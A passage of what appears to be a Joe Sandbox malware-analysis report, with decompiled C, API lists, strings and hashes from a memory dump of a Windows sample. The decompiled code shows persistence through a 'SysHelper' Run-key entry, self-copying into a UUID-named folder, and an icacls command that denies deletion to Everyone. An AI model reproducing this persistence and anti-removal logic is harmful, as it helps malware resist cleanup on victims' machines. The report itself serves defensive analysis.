							if(_v2296 != 0) {
								_t237 =  &_v2296;
								_t68 = _t237 + 2; // 0x2
								_t248 = _t68;
								do {
									_t207 =  *_t237;
									_t237 = _t237 + 2;
								} while (_t207 != 0);
								_t239 = _t237 - _t248 >> 1;
								L32:
								_push(_t239);
								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
								goto L33;
							}
							_t239 = 0;
							goto L32;
						}
					}
					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
					_t262 = _t213;
					if( &_v60 != _t213) {
						if(_v40 >= 8) {
							L00422587(_v60);
							_t264 = _t264 + 4;
						}
						_v40 = 7;
						_v44 = 0;
						_v60 = 0;
						E004145A0( &_v60, _t262);
					}
					if(_v120 >= 8) {
						L00422587(_v140);
						_t264 = _t264 + 4;
					}
					_t216 =  >=  ? _v60 :  &_v60;
					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60);
					if(_t124 == 0) {
						goto L19;
					} else {
						_t242 = _a4;
						if(_t242 != 0) {
							_t124 =  &_v60;
							if(_t242 != _t124) {
								_push(0xffffffff);
								_push(0);
								_t124 = E00414690(_t221, _t242, _t124);
							}
						}
						if(_v40 < 8) {
							goto L50;
						} else {
							_push(_v60);
							goto L49;
						}
					}
				}
				_t225 = 0;
				goto L6;
			}

0x00411cd0
0x00411cd9
0x00411cdb
0x00411ce0
0x00411ce6
0x00411ced
0x00411cf2
0x00411cf7
0x00411d10
0x00411d12
0x00411d1a
0x00412207
0x0041220b
0x00412216
0x00412216
0x00411d26
0x00411d34
0x00411d3b
0x00411d40
0x00411d43
0x00411d63
0x00411d6c
0x00411d74
0x00411d7b
0x00411d82
0x00411d8d
0x00411d93
0x00411d99
0x00411da0
0x00411da0
0x00411da3
0x00411da6
0x00411dad
0x00411daf
0x00411daf
0x00411dba
0x00411dbf
0x00411dc6
0x00411dcb
0x00411e7c
0x00411e7c
0x00411e87
0x00411e8c
0x00411e91
0x00411e91
0x00411ea5
0x00411eab
0x00411ead
0x00411ece
0x00411ee1
0x00411ef3
0x00411efc
0x00411f05
0x00411f14
0x00411f1a
0x00411f1f
0x00411f26
0x00411f2d
0x00411f34
0x00411f3a
0x00411f3c
0x00411f3c
0x00411f40
0x00411f40
0x00411f43
0x00411f46
0x00411f4d
0x00000000
0x00411f36
0x00411f36
0x00411f4f
0x00411f54
0x00411f5c
0x00411f64
0x00411f71
0x00411f77
0x00411f83
0x00411f8e
0x00411f96
0x00411fce
0x00411fd0
0x00411fd7
0x00411fde
0x00411fe9
0x00411fef
0x00411ff5
0x00412000
0x00412000
0x00412003
0x00412006
0x0041200d
0x0041200f
0x0041200f
0x0041201a
0x0041201f
0x0041202d
0x00412036
0x0041204c
0x00412055
0x0041206e
0x00412076
0x004121d1
0x004121d5
0x004121da
0x004121df
0x004121df
0x004121e2
0x004121e4
0x004121ef
0x004121f6
0x004121fa
0x004121fc
0x004121ff
0x004121ff
0x00412204
0x00000000
0x004121fa
0x00412082
0x00412090
0x004120a1
0x004120aa
0x004120c0
0x004120ce
0x004120f3
0x004120fc
0x00412102
0x00412107
0x00412110
0x00412110
0x00412120
0x00412125
0x00412128
0x00412134
0x0041213e
0x00412146
0x00412158
0x00412161
0x0041216d
0x0041217b
0x004121a0
0x004121a8
0x004121c0
0x004121ca
0x004121aa
0x004121aa
0x004121aa
0x00000000
0x004121a8
0x00411feb
0x00000000
0x00411feb
0x00411fa0
0x00411fa6
0x00411fac
0x00411fac
0x00411fb0
0x00411fb0
0x00411fb3
0x00411fb6
0x00411fbd
0x00411fbf
0x00411fbf
0x00411fc9
0x00000000
0x00411fc9
0x00411fa2
0x00000000
0x00411fa2
0x00411f34
0x00411dec
0x00411df1
0x00411df8
0x00411dfe
0x00411e03
0x00411e08
0x00411e08
0x00411e0d
0x00411e18
0x00411e1f
0x00411e23
0x00411e23
0x00411e2c
0x00411e34
0x00411e39
0x00411e39
0x00411e43
0x00411e48
0x00411e50
0x00000000
0x00411e52
0x00411e52
0x00411e57
0x00411e59
0x00411e5e
0x00411e60
0x00411e62
0x00411e65
0x00411e65
0x00411e5e
0x00411e6e
0x00000000
0x00411e74
0x00411e74
0x00000000
0x00411e74
0x00411e6e
0x00411e50
0x00411d8f
0x00000000

APIs

RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
_memset.LIBCMT ref: 00411D3B
RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
GetCommandLineW.KERNEL32 ref: 00411EB4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
lstrcpyW.KERNEL32 ref: 00411ECE
PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
UuidCreate.RPCRT4(?), ref: 00411EFC
UuidToStringW.RPCRT4(?,?), ref: 00411F14
RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
PathAppendW.SHLWAPI(?,?), ref: 00411F83
CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
DeleteFileW.KERNEL32(?), ref: 00412036
CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
_memset.LIBCMT ref: 00412090
lstrcpyW.KERNEL32 ref: 004120AA
lstrcatW.KERNEL32(?,?), ref: 004120C0
lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
lstrlenW.KERNEL32(?), ref: 004120D7
RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
RegCloseKey.ADVAPI32(00000000), ref: 004120FC
_memset.LIBCMT ref: 00412120
SetLastError.KERNEL32(00000000), ref: 00412146
lstrcpyW.KERNEL32 ref: 00412158
lstrcatW.KERNEL32(?,?), ref: 0041216D

Strings

" --AutoStart, xrefs: 00411DD1
SysHelper, xrefs: 00411D5B, 004120EB
SHGetFolderPathW, xrefs: 00411E9F
" /deny *S-1-1-0:(OI)(CI)(DE,DC), xrefs: 0041216F
Shell32.dll, xrefs: 00411E94
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00411D06, 00412064
icacls ", xrefs: 0041214C
" --AutoStart, xrefs: 004120C2
D, xrefs: 00412128

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
API String ID: 2589766509-1182136429
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00412220() {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				unsigned int _v20;
				unsigned int _v24;
				WCHAR* _v28;
				int _v32;
				char _v36;
				char _v2084;
				char _v43044;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				unsigned int _t40;
				void* _t50;
				struct HINSTANCE__* _t52;
				int _t56;
				signed int _t61;
				struct HINSTANCE__* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				void* _t65;
				void* _t66;

				E0042F7C0(0xa820);
				_t56 = 0;
				_v32 = 0;
				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
				_t62 = LoadLibraryW(L"kernel32.dll");
				_v8 = GetProcAddress(_t62, "EnumProcesses");
				_v12 = GetProcAddress(_t62, "EnumProcessModules");
				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
				_t37 = _v8;
				if(_t37 == 0) {
					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
					_t64 = _t52;
					_v8 = GetProcAddress(_t64, "EnumProcesses");
					_v12 = GetProcAddress(_t64, "EnumProcessModules");
					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
					_t37 = _v8;
				}
				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
				if(_t38 != 0) {
					_t61 = 0;
					_t40 = _v20 >> 2;
					_v24 = _t40;
					if(_t40 != 0) {
						do {
							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
							if(_t63 != 0) {
								_push( &_v36);
								_push(4);
								_push( &_v8);
								_push(_t63); // executed
								if(_v12() != 0) {
									_v16(_t63, _v8,  &_v2084, 0x400);
									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
									_t66 = _t66 + 8;
									if(_t50 == 0) {
										_t56 = _t56 + 1;
									}
								}
							}
							CloseHandle(_t63);
							_t61 = _t61 + 1;
						} while (_t61 < _v24);
					}
					return _t56;
				} else {
					return 1;
				}
			}

0x00412228
0x0041222f
0x00412232
0x00412253
0x00412262
0x00412272
0x0041227d
0x00412282
0x00412285
0x0041228a
0x00412291
0x00412297
0x004122a7
0x004122b2
0x004122b7
0x004122ba
0x004122ba
0x004122cd
0x004122d1
0x004122e2
0x004122e4
0x004122e7
0x004122ec
0x004122f0
0x00412304
0x00412308
0x0041230d
0x0041230e
0x00412313
0x00412314
0x0041231a
0x0041232c
0x00412339
0x0041233e
0x00412343
0x00412345
0x00412345
0x00412343
0x0041231a
0x00412347
0x0041234d
0x0041234e
0x004122f0
0x0041235b
0x004122d5
0x004122de
0x004122de

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

kernel32.dll, xrefs: 0041224E
EnumProcesses, xrefs: 00412264, 00412299
GetModuleBaseNameW, xrefs: 00412277, 004122AC
Psapi.dll, xrefs: 0041228C
EnumProcessModules, xrefs: 0041226C, 004122A1

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00423576(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t81;
				signed int _t83;
				void* _t84;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				void* _t94;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				void* _t106;
				signed int _t108;
				void* _t109;
				signed int _t111;
				signed int _t117;
				signed int _t126;
				signed int _t132;
				signed int* _t135;
				signed int _t139;
				signed int _t141;
				void* _t143;
				void* _t155;
				signed int _t158;
				signed int _t167;
				signed int* _t171;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr _t180;
				signed int _t182;
				void* _t184;
				void* _t186;
				signed int _t187;
				signed int _t188;

				_t167 = __edx;
				_t171 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t195 = _t171;
				if(_t171 != 0) {
					E0042B420(_t171, 0xff, 0x24);
					_t177 = _a8;
					__eflags = _t177;
					if(__eflags == 0) {
						goto L1;
					} else {
						__eflags =  *(_t177 + 4);
						if(__eflags > 0) {
							L9:
							_t84 = 7;
							__eflags =  *(_t177 + 4) - _t84;
							if(__eflags < 0) {
								L12:
								E0042FB64(0, _t167, _t171, _t177, __eflags); // executed
								_t87 = E0042F803( &_v12);
								__eflags = _t87;
								if(_t87 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E004242FD(0, _t167);
									asm("int3");
									_push(_t177);
									_t180 = _v52;
									_t89 =  *(_t180 + 0xc);
									__eflags = _t89 & 0x00000083;
									if(__eflags != 0) {
										_push(0);
										_t139 = _a8;
										 *(_t180 + 0xc) = _t89 & 0xffffffef;
										_push(_t171);
										__eflags = _t139 - 1;
										if(_t139 != 1) {
											_t173 = _a4;
										} else {
											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
											_t139 = 0;
										}
										E0042836B(_t167, _t180);
										_t92 =  *(_t180 + 0xc);
										__eflags = _t92;
										if(_t92 >= 0) {
											__eflags = _t92 & 0x00000001;
											if((_t92 & 0x00000001) != 0) {
												__eflags = _t92 & 0x00000008;
												if((_t92 & 0x00000008) != 0) {
													__eflags = _t92 & 0x00000400;
													if((_t92 & 0x00000400) == 0) {
														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
													}
												}
											}
										} else {
											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
										}
										_push(_t139);
										_push(_t173);
										_push(E0042816B(_t180));
										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
										__eflags = _t94 - 0xffffffff;
										_t78 = _t94 != 0xffffffff;
										__eflags = _t78;
										_t79 = (0 | _t78) - 1; // -1
										_t95 = _t79;
									} else {
										_t98 = E00425208(__eflags);
										 *_t98 = 0x16;
										_t95 = _t98 | 0xffffffff;
									}
									return _t95;
								} else {
									_t100 = E0042F82D( &_v16);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L45;
									} else {
										_t102 = E0042F857( &_v8);
										__eflags = _t102;
										if(_t102 != 0) {
											goto L45;
										} else {
											_t11 = _t177 + 4; // 0x858d0050
											_t141 =  *_t11;
											_t155 =  *_t177;
											__eflags = _t141;
											if(__eflags < 0) {
												L23:
												_t83 = E0042F939(_t171, _t177);
												__eflags = _t83;
												if(_t83 == 0) {
													__eflags = _v12 - _t83;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t182 = _t167;
														asm("cdq");
														_t143 =  *_t171 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t171);
														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
														__eflags = _t126;
														if(_t126 == 0) {
															goto L27;
														} else {
															asm("cdq");
															_t171[8] = 1;
															asm("cdq");
															_t143 =  *_t171 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t167;
															_t182 = _t167;
														}
													}
													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
													 *_t171 = _t105;
													__eflags = _t105;
													if(_t105 < 0) {
														_t143 = _t143 + 0xffffffc4;
														 *_t171 = _t105 + 0x3c;
														asm("adc esi, 0xffffffff");
													}
													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
													_t144 = _t167;
													asm("cdq");
													_t184 = _t106 + _t171[1];
													asm("adc ebx, edx");
													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
													_t171[1] = _t108;
													__eflags = _t108;
													if(_t108 < 0) {
														_t184 = _t184 + 0xffffffc4;
														_t171[1] = _t108 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
													_t145 = _t167;
													asm("cdq");
													_t186 = _t109 + _t171[2];
													asm("adc ebx, edx");
													_t111 = E004305A0(_t186, _t167, 0x18, 0);
													_t171[2] = _t111;
													__eflags = _t111;
													if(_t111 < 0) {
														_t186 = _t186 + 0xffffffe8;
														_t171[2] = _t111 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t158 = E004304F0(_t186, _t145, 0x18, 0);
													__eflags = _t167;
													if(__eflags < 0) {
														L43:
														_t171[3] = _t171[3] + _t158;
														asm("cdq");
														_t187 = 7;
														_t117 = _t171[3];
														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
														__eflags = _t117;
														if(_t117 > 0) {
															goto L38;
														} else {
															_t171[4] = 0xb;
															_t171[3] = _t117 + 0x1f;
															_t55 = _t158 + 0x16d; // 0x16d
															_t171[7] = _t171[7] + _t55;
															_t171[5] = _t171[5] - 1;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t188 = 7;
															_t39 =  &(_t171[3]);
															 *_t39 = _t171[3] + _t158;
															__eflags =  *_t39;
															_t171[6] = (_t171[6] + _t158) % _t188;
															L38:
															_t42 =  &(_t171[7]);
															 *_t42 = _t171[7] + _t158;
															__eflags =  *_t42;
														} else {
															__eflags = _t158;
															if(_t158 == 0) {
																__eflags = _t167;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t158;
																		if(_t158 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t155 - _v8;
													_v20 = _t141;
													_t83 = E0042F939(_t171,  &_v24);
													__eflags = _t83;
													if(_t83 == 0) {
														__eflags = _v12 - _t83;
														if(__eflags == 0) {
															L39:
															_t83 = 0;
														} else {
															_push(_t171);
															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
															__eflags = _t132;
															if(_t132 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t83 = E0042F939(_t171,  &_v24);
																__eflags = _t83;
																if(_t83 == 0) {
																	_t171[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t155 - 0x3f480;
													if(_t155 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t177 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t135 = E00425208(__eflags);
								_t178 = 0x16;
								 *_t135 = _t178;
								goto L2;
							} else {
								__eflags =  *_t177;
								if(__eflags >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t81 = E00425208(_t195);
					_t178 = 0x16;
					 *_t81 = _t178;
					E004242D2();
					L2:
					_t83 = _t178;
					L3:
					return _t83;
				}
			}

0x00423576
0x00423581
0x00423584
0x00423587
0x0042358a
0x0042358d
0x0042358f
0x004235b1
0x004235b6
0x004235bc
0x004235be
0x00000000
0x004235c0
0x004235c0
0x004235c3
0x004235d7
0x004235d9
0x004235da
0x004235dd
0x004235e9
0x004235e9
0x004235f2
0x004235f8
0x004235fa
0x004237e5
0x004237e5
0x004237e6
0x004237e7
0x004237e8
0x004237e9
0x004237ea
0x004237ef
0x004237f3
0x004237f4
0x004237f7
0x004237fa
0x004237fc
0x0042380e
0x0042380f
0x00423815
0x00423818
0x00423819
0x0042381c
0x0042382e
0x0042381e
0x00423827
0x00423829
0x0042382b
0x00423832
0x00423837
0x0042383b
0x0042383d
0x00423847
0x00423849
0x0042384b
0x0042384d
0x0042384f
0x00423854
0x00423856
0x00423856
0x00423854
0x0042384d
0x0042383f
0x00423842
0x00423842
0x0042385d
0x0042385e
0x00423866
0x00423867
0x00423871
0x00423874
0x00423874
0x00423879
0x00423879
0x004237fe
0x004237fe
0x00423803
0x00423809
0x00423809
0x0042387e
0x00423600
0x00423604
0x0042360a
0x0042360c
0x00000000
0x00423612
0x00423616
0x0042361c
0x0042361e
0x00000000
0x00423624
0x00423624
0x00423624
0x00423627
0x00423629
0x0042362b
0x0042369b
0x0042369d
0x004236a4
0x004236a6
0x004236ac
0x004236af
0x004236de
0x004236e0
0x004236e3
0x004236e8
0x004236e9
0x004236eb
0x004236b1
0x004236b1
0x004236b2
0x004236b8
0x004236ba
0x00000000
0x004236bc
0x004236c2
0x004236c5
0x004236d0
0x004236d3
0x004236d5
0x004236d7
0x004236da
0x004236da
0x004236ba
0x004236f3
0x004236f8
0x004236fa
0x004236fc
0x00423701
0x00423704
0x00423706
0x00423706
0x0042370f
0x00423716
0x0042371b
0x0042371c
0x00423722
0x00423726
0x0042372b
0x0042372e
0x00423730
0x00423735
0x00423738
0x0042373b
0x0042373b
0x00423744
0x0042374b
0x00423750
0x00423751
0x00423757
0x0042375b
0x00423760
0x00423763
0x00423765
0x0042376a
0x0042376d
0x00423770
0x00423770
0x0042377e
0x00423780
0x00423782
0x004237af
0x004237b5
0x004237bc
0x004237bd
0x004237c0
0x004237c3
0x004237c6
0x004237c8
0x00000000
0x004237ca
0x004237cd
0x004237d4
0x004237d7
0x004237dd
0x004237e0
0x004237e0
0x00423784
0x00423784
0x0042378a
0x00423791
0x00423792
0x00423795
0x00423795
0x00423795
0x00423798
0x0042379b
0x0042379b
0x0042379b
0x0042379b
0x00423786
0x00423786
0x00423788
0x004237a5
0x004237a7
0x004237a9
0x00000000
0x004237ab
0x004237ab
0x004237ad
0x00000000
0x00000000
0x004237ad
0x004237a9
0x00000000
0x00000000
0x00000000
0x00423788
0x00423784
0x00000000
0x00423782
0x0042362d
0x0042362d
0x00423637
0x0042363a
0x00423641
0x00423643
0x00423647
0x0042364a
0x00423651
0x00423653
0x00423659
0x0042365c
0x0042379e
0x0042379e
0x00423662
0x00423662
0x00423663
0x00423669
0x0042366b
0x00000000
0x00423671
0x00423674
0x00423675
0x0042367c
0x00423680
0x00423687
0x00423689
0x0042368f
0x00000000
0x0042368f
0x00423689
0x0042366b
0x0042365c
0x0042362f
0x0042362f
0x00423635
0x00000000
0x00000000
0x00000000
0x00000000
0x00423635
0x0042362d
0x00000000
0x0042362b
0x0042361e
0x0042360c
0x004235df
0x004235df
0x00000000
0x004235e1
0x004235e1
0x004235e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004235e7
0x004235df
0x004235c5
0x004235c5
0x004235cb
0x004235cb
0x004235d2
0x004235d3
0x00000000
0x004235c7
0x004235c7
0x004235c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004235c9
0x004235c5
0x004235c3
0x00423591
0x00423591
0x00423591
0x00423598
0x00423599
0x0042359b
0x004235a0
0x004235a0
0x004235a2
0x004235a8
0x004235a8

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
__invoke_watson.LIBCMT ref: 004237EA

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00427B0B(int _a4) {
				void* _t4;

				_t1 =  &_a4; // 0x423b69
				E00427AD7(_t4,  *_t1);
				ExitProcess(_a4);
			}

0x00427b0e
0x00427b11
0x00427b1a

APIs

___crtCorExitProcess.LIBCMT ref: 00427B11

Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8

ExitProcess.KERNEL32 ref: 00427B1A

Strings

i;B, xrefs: 00427B0E

Memory Dump Source

Source File: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.309223567.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.309229588.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID: i;B
API String ID: 2427264223-472376889
Opcode ID: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction ID: 59367741208a4d0b8125be5957acfda0e57e61d39344a7bf1a3f5abf2379cf84
Opcode Fuzzy Hash: 1085377ae278e01a80d78c7627d5840b2da43c7aca63d5a85146659919477565
Instruction Fuzzy Hash: 0DB09230404108BBCB052F52EC0A85D3F29EB003A0B408026F90848031EBB2AA919AC8

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF50 Relevance: 4.6, APIs: 3, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040EF50(intOrPtr __ecx, signed int __edx, void* __eflags, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* _t23;
				intOrPtr _t24;
				void* _t29;
				intOrPtr* _t30;
				signed int _t38;
				signed int _t39;
				signed int _t43;
				void* _t44;
				void* _t45;
				void* _t46;

				_t37 = __edx;
				_t39 = _a4;
				_t30 = __edx;
				_v12 = __ecx;
